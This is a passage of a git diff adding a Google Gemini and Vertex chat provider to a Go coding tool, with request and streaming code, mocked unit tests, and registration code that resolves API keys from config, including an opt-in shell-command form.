+			Input: []string{"text", "image"}, ContextWindow: 1000000, MaxTokens: 65536,
+		},
+		{
+			ID: "gemini-2.5-flash", Name: "Gemini 2.5 Flash", Provider: providerName, Reasoning: true,
+			Input: []string{"text", "image"}, ContextWindow: 1000000, MaxTokens: 65536,
+		},
+	}
+}
+
+func NewGeminiProvider(apiKey, baseURL string) *Provider {
+	return NewGeminiProviderWithModels(apiKey, baseURL, DefaultModels("google-gemini"))
+}
+
+func NewGeminiProviderWithModels(apiKey, baseURL string, models []*provider.Model) *Provider {
+	p, err := NewGeminiProviderWithModelsAndProxy(apiKey, baseURL, "", models)
+	if err != nil {
+		return newProviderWithHTTPClient("google-gemini", APIKindGemini, apiKey, baseURL, "https://generativelanguage.googleapis.com/v1beta/models", models, &http.Client{Timeout: 30 * time.Minute})
+	}
+	return p
+}
+
+func NewGeminiProviderWithModelsAndProxy(apiKey, baseURL, proxyURL string, models []*provider.Model) (*Provider, error) {
+	return newProvider("google-gemini", APIKindGemini, apiKey, baseURL, "https://generativelanguage.googleapis.com/v1beta/models", proxyURL, models)
+}
+
+func NewVertexProvider(apiKey, baseURL string) *Provider {
+	return NewVertexProviderWithModels(apiKey, baseURL, DefaultModels("google-vertex"))
+}
+
+func NewVertexProviderWithModels(apiKey, baseURL string, models []*provider.Model) *Provider {
+	p, err := NewVertexProviderWithModelsAndProxy(apiKey, baseURL, "", models)
+	if err != nil {
+		return newProviderWithHTTPClient("google-vertex", APIKindVertex, apiKey, baseURL, "https://aiplatform.googleapis.com/v1/projects/YOUR_PROJECT/locations/global/publishers/google/models", models, &http.Client{Timeout: 30 * time.Minute})
+	}
+	return p
+}
+
+func NewVertexProviderWithModelsAndProxy(apiKey, baseURL, proxyURL string, models []*provider.Model) (*Provider, error) {
+	return newProvider("google-vertex", APIKindVertex, apiKey, baseURL, "https://aiplatform.googleapis.com/v1/projects/YOUR_PROJECT/locations/global/publishers/google/models", proxyURL, models)
+}
+
+func newProvider(name string, kind APIKind, apiKey, baseURL, defaultBaseURL, proxyURL string, models []*provider.Model) (*Provider, error) {
+	client, err := provider.NewHTTPClient(30*time.Minute, proxyURL)
+	if err != nil {
+		return nil, fmt.Errorf("configure http proxy: %w", err)
+	}
+	return newProviderWithHTTPClient(name, kind, apiKey, baseURL, defaultBaseURL, models, client), nil
+}
+
+func newProviderWithHTTPClient(name string, kind APIKind, apiKey, baseURL, defaultBaseURL string, models []*provider.Model, client *http.Client) *Provider {
+	if baseURL == "" {
+		baseURL = defaultBaseURL
+	}
+	if apiKey == "" {
+		switch kind {
+		case APIKindGemini:
+			apiKey = os.Getenv("GOOGLE_API_KEY")
+		case APIKindVertex:
+			apiKey = os.Getenv("GOOGLE_VERTEX_ACCESS_TOKEN")
+		}
+	}
+	return &Provider{
+		BaseProvider: provider.NewBaseProvider(name, models),
+		apiKey:       apiKey,
+		baseURL:      strings.TrimRight(baseURL, "/"),
+		apiKind:      kind,
+		client:       client,
+	}
+}
+
+func (p *Provider) SetRetryConfig(cfg *provider.RetryConfig) {
+	p.retryConfig = cfg
+}
+
+// SetCachedContent sets an explicit Google cached content resource to reuse.
+// The value should be a full cached content resource name, for example
+// "cachedContents/abc123". Empty disables explicit cached content reuse.
+func (p *Provider) SetCachedContent(name string) {
+	p.cachedContent = strings.TrimSpace(name)
+}
+
+type googleRequest struct {
+	SystemInstruction *googleContent        `json:"systemInstruction,omitempty"`
+	Contents          []googleContent       `json:"contents"`
+	Tools             []googleTool          `json:"tools,omitempty"`
+	GenerationConfig  *googleGenerationConf `json:"generationConfig,omitempty"`
+	CachedContent     string                `json:"cachedContent,omitempty"`
+}
+
+type googleGenerationConf struct {
+	MaxOutputTokens int                   `json:"maxOutputTokens,omitempty"`
+	Temperature     *float64              `json:"temperature,omitempty"`
+	TopP            *float64              `json:"topP,omitempty"`
+	ThinkingConfig  *googleThinkingConfig `json:"thinkingConfig,omitempty"`
+}
+
+type googleThinkingConfig struct {
+	ThinkingBudget  int  `json:"thinkingBudget,omitempty"`
+	IncludeThoughts bool `json:"includeThoughts,omitempty"`
+}
+
+type googleContent struct {
+	Role  string       `json:"role,omitempty"`
+	Parts []googlePart `json:"parts"`
+}
+
+type googlePart struct {
+	Text             string                  `json:"text,omitempty"`
+	Thought          bool                    `json:"thought,omitempty"`
+	ThoughtSignature string                  `json:"thoughtSignature,omitempty"`
+	InlineData       *googleInlineData       `json:"inlineData,omitempty"`
+	FunctionCall     *googleFunctionCall     `json:"functionCall,omitempty"`
+	FunctionResponse *googleFunctionResponse `json:"functionResponse,omitempty"`
+}
+
+type googleInlineData struct {
+	MimeType string `json:"mimeType"`
+	Data     string `json:"data"`
+}
+
+type googleFunctionCall struct {
+	Name string          `json:"name"`
+	Args json.RawMessage `json:"args,omitempty"`
+}
+
+type googleFunctionResponse struct {
+	Name     string         `json:"name"`
+	Response map[string]any `json:"response"`
+}
+
+type googleTool struct {
+	FunctionDeclarations []googleFunctionDeclaration `json:"functionDeclarations,omitempty"`
+}
+
+type googleFunctionDeclaration struct {
+	Name        string          `json:"name"`
+	Description string          `json:"description,omitempty"`
+	Parameters  json.RawMessage `json:"parameters,omitempty"`
+}
+
+type googleResponse struct {
+	Candidates    []googleCandidate    `json:"candidates,omitempty"`
+	UsageMetadata *googleUsageMetadata `json:"usageMetadata,omitempty"`
+	Error         *googleResponseError `json:"error,omitempty"`
+}
+
+type googleCandidate struct {
+	Content      googleContent `json:"content"`
+	FinishReason string        `json:"finishReason,omitempty"`
+}
+
+type googleUsageMetadata struct {
+	PromptTokenCount        int `json:"promptTokenCount,omitempty"`
+	CandidatesTokenCount    int `json:"candidatesTokenCount,omitempty"`
+	TotalTokenCount         int `json:"totalTokenCount,omitempty"`
+	ThoughtsTokenCount      int `json:"thoughtsTokenCount,omitempty"`
+	CachedContentTokenCount int `json:"cachedContentTokenCount,omitempty"`
+}
+
+type googleResponseError struct {
+	Code    int    `json:"code,omitempty"`
+	Message string `json:"message,omitempty"`
+	Status  string `json:"status,omitempty"`
+}
+
+func (p *Provider) Chat(ctx context.Context, params provider.ChatParams) <-chan provider.StreamEvent {
+	ch := make(chan provider.StreamEvent, 100)
+	go func() {
+		defer close(ch)
+
+		if p.apiKey == "" {
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("%s API key/token not set", p.Name())}
+			return
+		}
+
+		modelID := params.ModelID
+		if modelID == "" {
+			if len(p.Models()) > 0 {
+				modelID = p.Models()[0].ID
+			} else {
+				modelID = "gemini-2.5-flash"
+			}
+		}
+
+		reqBody := googleRequest{
+			Contents:         p.convertMessages(params),
+			Tools:            p.convertTools(params.Tools),
+			GenerationConfig: p.generationConfig(params, p.GetModel(modelID)),
+		}
+		if p.cachedContent != "" {
+			reqBody.CachedContent = p.cachedContent
+		}
+		if params.SystemPrompt != "" {
+			reqBody.SystemInstruction = &googleContent{Parts: []googlePart{{Text: params.SystemPrompt}}}
+		}
+
+		body, err := json.Marshal(reqBody)
+		if err != nil {
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("marshal request: %w", err)}
+			return
+		}
+		if os.Getenv("VIBECODING_DEBUG") != "" {
+			fmt.Fprintf(os.Stderr, "[DEBUG] Google request body: %s\n", string(body))
+		}
+
+		maxRetries := 0
+		baseDelayMs := 2000
+		if p.retryConfig != nil && p.retryConfig.Enabled {
+			maxRetries = p.retryConfig.MaxRetries
+			baseDelayMs = p.retryConfig.BaseDelayMs
+		}
+
+		endpoint := p.streamEndpoint(modelID)
+		for attempt := 0; attempt <= maxRetries; attempt++ {
+			if err := ctx.Err(); err != nil {
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: err, StopReason: "aborted"}
+				return
+			}
+
+			req, err := http.NewRequestWithContext(ctx, "POST", endpoint, bytes.NewReader(body))
+			if err != nil {
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("create request: %w", err)}
+				return
+			}
+			p.setHeaders(req)
+
+			resp, err := p.client.Do(req)
+			if err != nil {
+				if attempt < maxRetries && provider.IsRetryable(err, 0) {
+					delay := provider.RetryDelay(attempt, baseDelayMs)
+					ch <- provider.StreamEvent{Type: provider.StreamRetry, RetryAttempt: attempt + 1, RetryMax: maxRetries, Error: fmt.Errorf("%s", provider.FormatRetryMessage(attempt, maxRetries, delay, err))}
+					if !sleepOrAbort(ctx, delay, ch) {
+						return
+					}
+					continue
+				}
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("send request: %w", err)}
+				return
+			}
+
+			if resp.StatusCode != http.StatusOK {
+				bodyBytes, _ := io.ReadAll(resp.Body)
+				resp.Body.Close()
+				if attempt < maxRetries && provider.IsRetryable(nil, resp.StatusCode) {
+					delay := provider.RetryDelay(attempt, baseDelayMs)
+					err := fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(bodyBytes))
+					ch <- provider.StreamEvent{Type: provider.StreamRetry, RetryAttempt: attempt + 1, RetryMax: maxRetries, Error: fmt.Errorf("%s", provider.FormatRetryMessage(attempt, maxRetries, delay, err))}
+					if !sleepOrAbort(ctx, delay, ch) {
+						return
+					}
+					continue
+				}
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("API error %d: %s", resp.StatusCode, string(bodyBytes))}
+				return
+			}
+
+			p.parseSSE(ctx, resp.Body, ch, params)
+			resp.Body.Close()
+			return
+		}
+		ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("all %d retry attempts exhausted", maxRetries)}
+	}()
+	return ch
+}
+
+func sleepOrAbort(ctx context.Context, delay time.Duration, ch chan<- provider.StreamEvent) bool {
+	select {
+	case <-ctx.Done():
+		ch <- provider.StreamEvent{Type: provider.StreamError, Error: ctx.Err(), StopReason: "aborted"}
+		return false
+	case <-time.After(delay):
+		return true
+	}
+}
+
+func (p *Provider) setHeaders(req *http.Request) {
+	req.Header.Set("Content-Type", "application/json")
+	req.Header.Set("Accept", "text/event-stream")
+	req.Header.Set("User-Agent", ua.ProviderUserAgent())
+	switch p.apiKind {
+	case APIKindVertex:
+		req.Header.Set("Authorization", "Bearer "+p.apiKey)
+	default:
+		req.Header.Set("x-goog-api-key", p.apiKey)
+	}
+}
+
+func (p *Provider) streamEndpoint(modelID string) string {
+	base := strings.TrimRight(p.baseURL, "/")
+	model := strings.TrimPrefix(modelID, "models/")
+	if strings.Contains(model, "/") {
+		model = strings.Trim(model, "/")
+	}
+	return base + "/" + model + ":streamGenerateContent?alt=sse"
+}
+
+func (p *Provider) generationConfig(params provider.ChatParams, model *provider.Model) *googleGenerationConf {
+	maxTokens := params.MaxTokens
+	if maxTokens == 0 {
+		maxTokens = 16384
+	}
+	cfg := &googleGenerationConf{
+		MaxOutputTokens: maxTokens,
+		Temperature:     params.Temperature,
+		TopP:            params.TopP,
+	}
+	if params.ThinkingLevel != provider.ThinkingOff && model != nil && model.Reasoning {
+		cfg.ThinkingConfig = &googleThinkingConfig{ThinkingBudget: googleThinkingBudget(params.ThinkingLevel), IncludeThoughts: true}
+	}
+	return cfg
+}
+
+func googleThinkingBudget(level provider.ThinkingLevel) int {
+	switch level {
+	case provider.ThinkingMinimal:
+		return 128
+	case provider.ThinkingLow:
+		return 1024
+	case provider.ThinkingHigh:
+		return 8192
+	case provider.ThinkingXHigh:
+		return 24576
+	default:
+		return 4096
+	}
+}
+
+func (p *Provider) convertMessages(params provider.ChatParams) []googleContent {
+	var contents []googleContent
+	for _, msg := range params.Messages {
+		content := googleContent{Role: googleRole(msg.Role)}
+		if msg.Role == "toolResult" {
+			response := map[string]any{"content": msg.Content}
+			if msg.IsError {
+				response["error"] = true
+			}
+			content.Parts = append(content.Parts, googlePart{FunctionResponse: &googleFunctionResponse{Name: msg.ToolName, Response: response}})
+			contents = append(contents, content)
+			continue
+		}
+
+		if len(msg.Contents) == 0 {
+			if msg.Content != "" {
+				content.Parts = append(content.Parts, googlePart{Text: msg.Content})
+			}
+			if len(content.Parts) > 0 {
+				contents = append(contents, content)
+			}
+			continue
+		}
+
+		for _, block := range msg.Contents {
+			switch block.Type {
+			case "text":
+				if block.Text != "" {
+					content.Parts = append(content.Parts, googlePart{Text: block.Text})
+				}
+			case "image":
+				if block.Image != nil {
+					content.Parts = append(content.Parts, googlePart{InlineData: &googleInlineData{MimeType: block.Image.MimeType, Data: block.Image.Data}})
+				}
+			case "toolCall":
+				if block.ToolCall != nil {
+					content.Parts = append(content.Parts, googlePart{FunctionCall: &googleFunctionCall{Name: block.ToolCall.Name, Args: block.ToolCall.Arguments}})
+				}
+			}
+		}
+		if len(content.Parts) > 0 {
+			contents = append(contents, content)
+		}
+	}
+	return contents
+}
+
+func googleRole(role string) string {
+	switch role {
+	case "assistant":
+		return "model"
+	case "toolResult":
+		return "user"
+	default:
+		return "user"
+	}
+}
+
+func (p *Provider) convertTools(tools []provider.ToolDefinition) []googleTool {
+	var declarations []googleFunctionDeclaration
+	for _, t := range tools {
+		if t.Kind == "hosted" {
+			continue
+		}
+		declarations = append(declarations, googleFunctionDeclaration{Name: t.Name, Description: t.Description, Parameters: t.Parameters})
+	}
+	if len(declarations) == 0 {
+		return nil
+	}
+	return []googleTool{{FunctionDeclarations: declarations}}
+}
+
+func (p *Provider) parseSSE(ctx context.Context, body io.Reader, ch chan<- provider.StreamEvent, params provider.ChatParams) {
+	scanner := bufio.NewScanner(body)
+	scanner.Buffer(make([]byte, 1024*1024), 1024*1024)
+
+	ch <- provider.StreamEvent{Type: provider.StreamStart}
+	var usage *provider.Usage
+	var stopReason string
+	toolCallIndex := 0
+
+	for scanner.Scan() {
+		select {
+		case <-ctx.Done():
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: ctx.Err(), StopReason: "aborted"}
+			return
+		case <-params.Abort:
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("aborted"), StopReason: "aborted"}
+			return
+		default:
+		}
+
+		line := scanner.Text()
+		if !strings.HasPrefix(line, "data: ") {
+			continue
+		}
+		data := strings.TrimPrefix(line, "data: ")
+		if data == "[DONE]" {
+			break
+		}
+
+		var chunk googleResponse
+		if err := json.Unmarshal([]byte(data), &chunk); err != nil {
+			continue
+		}
+		if chunk.Error != nil {
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("%s: %s", chunk.Error.Status, chunk.Error.Message), StopReason: "error"}
+			return
+		}
+		if chunk.UsageMetadata != nil {
+			usage = convertUsage(chunk.UsageMetadata)
+		}
+
+		for _, candidate := range chunk.Candidates {
+			if candidate.FinishReason != "" {
+				stopReason = strings.ToLower(candidate.FinishReason)
+			}
+			for _, part := range candidate.Content.Parts {
+				if part.Text != "" {
+					if part.Thought {
+						ch <- provider.StreamEvent{Type: provider.StreamThinkDelta, ThinkDelta: part.Text}
+					} else {
+						ch <- provider.StreamEvent{Type: provider.StreamTextDelta, TextDelta: part.Text}
+					}
+				}
+				if part.ThoughtSignature != "" {
+					ch <- provider.StreamEvent{Type: provider.StreamThinkSignature, ThinkSignature: part.ThoughtSignature}
+				}
+				if part.FunctionCall != nil {
+					toolCallIndex++
+					args := part.FunctionCall.Args
+					if len(args) == 0 {
+						args = json.RawMessage(`{}`)
+					}
+					tc := &provider.ToolCallBlock{
+						ID:        fmt.Sprintf("google_toolcall_%d", toolCallIndex),
+						Name:      part.FunctionCall.Name,
+						Arguments: args,
+					}
+					ch <- provider.StreamEvent{Type: provider.StreamToolCall, ToolCall: tc}
+				}
+			}
+		}
+	}
+
+	if err := scanner.Err(); err != nil {
+		ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("stream read error: %w", err), StopReason: "error"}
+		return
+	}
+	if usage != nil {
+		ch <- provider.StreamEvent{Type: provider.StreamUsage, Usage: usage}
+	}
+	ch <- provider.StreamEvent{Type: provider.StreamDone, StopReason: stopReason}
+}
+
+func convertUsage(u *googleUsageMetadata) *provider.Usage {
+	if u == nil {
+		return nil
+	}
+	return &provider.Usage{
+		Input:       u.PromptTokenCount,
+		Output:      u.CandidatesTokenCount,
+		Reasoning:   u.ThoughtsTokenCount,
+		CacheRead:   u.CachedContentTokenCount,
+		TotalTokens: u.TotalTokenCount,
+	}
+}
diff --git a/internal/provider/google/provider_test.go b/internal/provider/google/provider_test.go
new file mode 100644
index 0000000..53aba7f
--- /dev/null
+++ b/internal/provider/google/provider_test.go
@@ -0,0 +1,246 @@
+package google
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"io"
+	"net/http"
+	"net/url"
+	"testing"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+)
+
+type roundTripFunc func(*http.Request) (*http.Response, error)
+
+func (f roundTripFunc) RoundTrip(r *http.Request) (*http.Response, error) {
+	return f(r)
+}
+
+func newMockGoogleProvider(t *testing.T, p *Provider, sse string, bodyCh chan<- string, check func(*http.Request)) *Provider {
+	t.Helper()
+	p.client = &http.Client{Transport: roundTripFunc(func(r *http.Request) (*http.Response, error) {
+		if check != nil {
+			check(r)
+		}
+		if bodyCh != nil {
+			body, err := io.ReadAll(r.Body)
+			if err != nil {
+				return nil, err
+			}
+			bodyCh <- string(body)
+		}
+		return &http.Response{
+			StatusCode: http.StatusOK,
+			Header:     make(http.Header),
+			Body:       io.NopCloser(bytes.NewBufferString(sse)),
+			Request:    r,
+		}, nil
+	})}
+	return p
+}
+
+func TestResolveAPIKeyShellCommandRequiresOptIn(t *testing.T) {
+	t.Setenv("VIBECODING_ALLOW_SHELL_CONFIG", "")
+	if got := resolveAPIKey(&config.ProviderConfig{APIKey: "!printf secret"}); got != "!printf secret" {
+		t.Fatalf("resolveAPIKey without opt-in = %q, want literal", got)
+	}
+
+	t.Setenv("VIBECODING_ALLOW_SHELL_CONFIG", "1")
+	if got := resolveAPIKey(&config.ProviderConfig{APIKey: "!printf secret"}); got != "secret" {
+		t.Fatalf("resolveAPIKey with opt-in = %q, want secret", got)
+	}
+}
+
+func TestGoogleProviderHTTPProxy(t *testing.T) {
+	p, err := NewGeminiProviderWithModelsAndProxy("fake-key", "https://generativelanguage.googleapis.com/v1beta/models", "http://127.0.0.1:7890", []*provider.Model{{ID: "m1"}})
+	if err != nil {
+		t.Fatalf("provider with proxy: %v", err)
+	}
+	transport, ok := p.client.Transport.(*http.Transport)
+	if !ok {
+		t.Fatalf("transport = %T, want *http.Transport", p.client.Transport)
+	}
+	proxyURL, err := transport.Proxy(&http.Request{URL: &url.URL{Scheme: "https", Host: "generativelanguage.googleapis.com"}})
+	if err != nil {
+		t.Fatalf("proxy lookup: %v", err)
+	}
+	if proxyURL == nil || proxyURL.String() != "http://127.0.0.1:7890" {
+		t.Fatalf("proxy = %v, want http://127.0.0.1:7890", proxyURL)
+	}
+}
+
+func TestGoogleGeminiRequest(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockGoogleProvider(t,
+		NewGeminiProviderWithModels("fake-key", "https://generativelanguage.googleapis.com/v1beta/models", []*provider.Model{{ID: "gemini-test", Reasoning: true}}),
+		"data: {\"candidates\":[{\"content\":{\"parts\":[{\"text\":\"ok\"}]},\"finishReason\":\"STOP\"}]}\n",
+		bodyCh,
+		func(r *http.Request) {
+			if r.URL.Path != "/v1beta/models/gemini-test:streamGenerateContent" {
+				t.Fatalf("path = %q, want /v1beta/models/gemini-test:streamGenerateContent", r.URL.Path)
+			}
+			if r.URL.Query().Get("alt") != "sse" {
+				t.Fatalf("alt query = %q, want sse", r.URL.Query().Get("alt"))
+			}
+			if r.Header.Get("x-goog-api-key") != "fake-key" {
+				t.Fatalf("x-goog-api-key = %q, want fake-key", r.Header.Get("x-goog-api-key"))
+			}
+		})
+
+	temp := 0.2
+	params := provider.ChatParams{
+		ModelID:       "gemini-test",
+		SystemPrompt:  "system",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		Tools:         []provider.ToolDefinition{{Name: "read", Description: "Read file", Parameters: json.RawMessage(`{"type":"object"}`)}},
+		ThinkingLevel: provider.ThinkingHigh,
+		MaxTokens:     123,
+		Temperature:   &temp,
+		Abort:         make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var req googleRequest
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &req); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if req.SystemInstruction == nil || req.SystemInstruction.Parts[0].Text != "system" {
+		t.Fatalf("systemInstruction = %#v, want system text", req.SystemInstruction)
+	}
+	if len(req.Contents) != 1 || req.Contents[0].Role != "user" || req.Contents[0].Parts[0].Text != "hi" {
+		t.Fatalf("contents = %#v, want user hi", req.Contents)
+	}
+	if req.GenerationConfig == nil || req.GenerationConfig.MaxOutputTokens != 123 {
+		t.Fatalf("generationConfig = %#v, want max 123", req.GenerationConfig)
+	}
+	if req.GenerationConfig.Temperature == nil || *req.GenerationConfig.Temperature != temp {
+		t.Fatalf("temperature = %#v, want %v", req.GenerationConfig.Temperature, temp)
+	}
+	if req.GenerationConfig.ThinkingConfig == nil || req.GenerationConfig.ThinkingConfig.ThinkingBudget != 8192 {
+		t.Fatalf("thinkingConfig = %#v, want high budget", req.GenerationConfig.ThinkingConfig)
+	}
+	if !req.GenerationConfig.ThinkingConfig.IncludeThoughts {
+		t.Fatal("thinkingConfig.includeThoughts = false, want true")
+	}
+	if len(req.Tools) != 1 || len(req.Tools[0].FunctionDeclarations) != 1 || req.Tools[0].FunctionDeclarations[0].Name != "read" {
+		t.Fatalf("tools = %#v, want read declaration", req.Tools)
+	}
+}
+
+func TestGoogleRequestCachedContent(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := NewGeminiProviderWithModels("fake-key", "https://generativelanguage.googleapis.com/v1beta/models", []*provider.Model{{ID: "gemini-test"}})
+	p.SetCachedContent("cachedContents/test-cache")
+	p = newMockGoogleProvider(t, p, "data: {}\n", bodyCh, nil)
+
+	for range p.Chat(context.Background(), provider.ChatParams{
+		ModelID:  "gemini-test",
+		Messages: []provider.Message{provider.NewUserMessage("hi")},
+		Abort:    make(chan struct{}),
+	}) {
+	}
+
+	var req googleRequest
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &req); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+
+	if req.CachedContent != "cachedContents/test-cache" {
+		t.Fatalf("cachedContent = %q, want cachedContents/test-cache", req.CachedContent)
+	}
+}
+
+func TestGoogleVertexAuthorizationHeader(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockGoogleProvider(t,
+		NewVertexProviderWithModels("fake-token", "https://aiplatform.googleapis.com/v1/projects/test/locations/global/publishers/google/models", []*provider.Model{{ID: "gemini-test"}}),
+		"data: {}\n",
+		bodyCh,
+		func(r *http.Request) {
+			if r.URL.Path != "/v1/projects/test/locations/global/publishers/google/models/gemini-test:streamGenerateContent" {
+				t.Fatalf("path = %q, want Vertex streamGenerateContent path", r.URL.Path)
+			}
+			if r.Header.Get("Authorization") != "Bearer fake-token" {
+				t.Fatalf("Authorization = %q, want Bearer fake-token", r.Header.Get("Authorization"))
+			}
+		})
+
+	for range p.Chat(context.Background(), provider.ChatParams{
+		ModelID:  "gemini-test",
+		Messages: []provider.Message{provider.NewUserMessage("hi")},
+		Abort:    make(chan struct{}),
+	}) {
+	}
+}
+
+func TestGoogleStreamTextThinkToolCallAndUsage(t *testing.T) {
+	sse := "data: {\"candidates\":[{\"content\":{\"parts\":[{\"text\":\"thinking\",\"thought\":true,\"thoughtSignature\":\"sig-1\"},{\"text\":\"Hello \"}]}}]}\n" +
+		"data: {\"candidates\":[{\"content\":{\"parts\":[{\"functionCall\":{\"name\":\"read\",\"args\":{\"path\":\"main.go\"}}}]},\"finishReason\":\"STOP\"}],\"usageMetadata\":{\"promptTokenCount\":10,\"candidatesTokenCount\":5,\"thoughtsTokenCount\":2,\"cachedContentTokenCount\":7,\"totalTokenCount\":17}}\n"
+	p := newMockGoogleProvider(t,
+		NewGeminiProviderWithModels("fake-key", "https://generativelanguage.googleapis.com/v1beta/models", []*provider.Model{{ID: "gemini-test"}}),
+		sse,
+		nil,
+		nil)
+
+	var text string
+	var think string
+	var thinkSignature string
+	var tool *provider.ToolCallBlock
+	var usage *provider.Usage
+	var done bool
+	for ev := range p.Chat(context.Background(), provider.ChatParams{
+		ModelID:  "gemini-test",
+		Messages: []provider.Message{provider.NewUserMessage("hi")},
+		Abort:    make(chan struct{}),
+	}) {
+		switch ev.Type {
+		case provider.StreamTextDelta:
+			text += ev.TextDelta
+		case provider.StreamThinkDelta:
+			think += ev.ThinkDelta
+		case provider.StreamThinkSignature:
+			thinkSignature = ev.ThinkSignature
+		case provider.StreamToolCall:
+			tool = ev.ToolCall
+		case provider.StreamUsage:
+			usage = ev.Usage
+		case provider.StreamDone:
+			done = true
+			if ev.StopReason != "stop" {
+				t.Fatalf("stop reason = %q, want stop", ev.StopReason)
+			}
+		}
+	}
+	if text != "Hello " {
+		t.Fatalf("text = %q, want Hello", text)
+	}
+	if think != "thinking" {
+		t.Fatalf("think = %q, want thinking", think)
+	}
+	if thinkSignature != "sig-1" {
+		t.Fatalf("thinkSignature = %q, want sig-1", thinkSignature)
+	}
+	if tool == nil || tool.Name != "read" || string(tool.Arguments) != `{"path":"main.go"}` {
+		t.Fatalf("tool = %#v, want read path", tool)
+	}
+	if usage == nil || usage.Input != 10 || usage.Output != 5 || usage.Reasoning != 2 || usage.CacheRead != 7 || usage.TotalTokens != 17 {
+		t.Fatalf("usage = %#v, want token counts", usage)
+	}
+	if !done {
+		t.Fatal("missing StreamDone")
+	}
+}
diff --git a/internal/provider/google/register.go b/internal/provider/google/register.go
new file mode 100644
index 0000000..1f9ec7e
--- /dev/null
+++ b/internal/provider/google/register.go
@@ -0,0 +1,116 @@
+package google
+
+import (
+	"os"
+	"os/exec"
+	"strings"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/platform"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+)
+
+func init() {
+	provider.Register("google-gemini", func(cfg *config.ProviderConfig) (provider.Provider, error) {
+		if cfg == nil {
+			return NewGeminiProvider("", ""), nil
+		}
+		return NewGeminiProviderWithModelsAndProxy(resolveAPIKey(cfg), cfg.BaseURL, cfg.HTTPProxy, convertModels("google-gemini", cfg.Models))
+	})
+	provider.Register("google-vertex", func(cfg *config.ProviderConfig) (provider.Provider, error) {
+		if cfg == nil {
+			return NewVertexProvider("", ""), nil
+		}
+		return NewVertexProviderWithModelsAndProxy(resolveAPIKey(cfg), cfg.BaseURL, cfg.HTTPProxy, convertModels("google-vertex", cfg.Models))
+	})
+}
+
+func resolveAPIKey(cfg *config.ProviderConfig) string {
+	if cfg == nil {
+		return ""
+	}
+	key := cfg.APIKey
+	if strings.HasPrefix(key, "!") {
+		if os.Getenv("VIBECODING_ALLOW_SHELL_CONFIG") != "1" {
+			return key
+		}
+		return resolveProviderShellCommand(key[1:])
+	}
+	if strings.HasPrefix(key, "${") && strings.HasSuffix(key, "}") {
+		return os.Getenv(key[2 : len(key)-1])
+	}
+	return key
+}
+
+func resolveProviderShellCommand(cmd string) string {
+	if cmd == "" {
+		return ""
+	}
+	var out []byte
+	var err error
+	if platform.IsWindows() {
+		out, err = exec.Command("powershell.exe", "-NoProfile", "-NonInteractive", "-Command", cmd).Output()
+	} else {
+		out, err = exec.Command("sh", "-c", cmd).Output()
+	}
+	if err != nil {
+		return ""
+	}
+	return strings.TrimSpace(string(out))
+}
+
+func convertModels(providerName string, models []config.ModelConfig) []*provider.Model {
+	if len(models) == 0 {
+		return DefaultModels(providerName)
+	}
+	result := make([]*provider.Model, 0, len(models))
+	for _, m := range models {
+		input := m.Input
+		if len(input) == 0 {
+			input = []string{"text", "image"}
+		}
+		result = append(result, &provider.Model{
+			ID:            m.ID,
+			Name:          m.Name,
+			Provider:      providerName,
+			Reasoning:     m.Reasoning,
+			Input:         input,
+			ContextWindow: m.ContextWindow,
+			MaxTokens:     m.MaxTokens,
+			Temperature:   m.Temperature,
+			TopP:          m.TopP,
+			Compat:        toCompat(m.Compat),
+		})
+	}
+	return result
+}
+
+func toCompat(c *config.ModelCompat) *provider.ModelCompat {
+	if c == nil {
+		return nil
+	}
+	return &provider.ModelCompat{
+		ThinkingFormat:                      c.ThinkingFormat,
+		RequiresReasoningContentOnAssistant: c.RequiresReasoningContentOnAssistant || c.RequiresReasoningContentOnAssistantMessages,
+		ForceAdaptiveThinking:               c.ForceAdaptiveThinking,
+		SupportsDeveloperRole:               cloneBool(c.SupportsDeveloperRole),
+		SupportsStore:                       cloneBool(c.SupportsStore),
+		SupportsReasoningEffort:             cloneBool(c.SupportsReasoningEffort),
+		SupportsStrictMode:                  cloneBool(c.SupportsStrictMode),
+		MaxTokensField:                      c.MaxTokensField,
+		SupportsCacheControlOnTools:         cloneBool(c.SupportsCacheControlOnTools),
+		SupportsLongCacheRetention:          cloneBool(c.SupportsLongCacheRetention),
+		SupportsPromptCacheKey:              cloneBool(c.SupportsPromptCacheKey),
+		SupportsReasoningSummary:            cloneBool(c.SupportsReasoningSummary),
+		SendSessionAffinityHeaders:          c.SendSessionAffinityHeaders,
+		SupportsEagerToolInputStreaming:     cloneBool(c.SupportsEagerToolInputStreaming),
+	}
+}
+
+func cloneBool(v *bool) *bool {
+	if v == nil {
+		return nil
+	}
+	c := *v
+	return &c
+}
diff --git a/internal/provider/hosted_tools.go b/internal/provider/hosted_tools.go
new file mode 100644
index 0000000..74294d9
--- /dev/null
+++ b/internal/provider/hosted_tools.go
